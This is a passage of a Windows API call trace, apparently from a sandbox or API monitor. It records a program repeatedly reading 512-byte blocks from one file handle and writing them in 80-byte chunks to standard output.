lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] GetFileType (hFile=0x4c) returned 0x1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, 
lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.113] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] GetFileType (hFile=0x4c) returned 0x1 [0094.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.114] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.114] GetFileType (hFile=0x4c) returned 0x1 [0094.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.115] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] GetFileType (hFile=0x4c) returned 0x1 [0094.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, 
lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: 
lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.116] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] GetFileType (hFile=0x4c) returned 0x1 [0094.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.117] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] 
GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 
[0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.118] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.119] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType 
(hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, 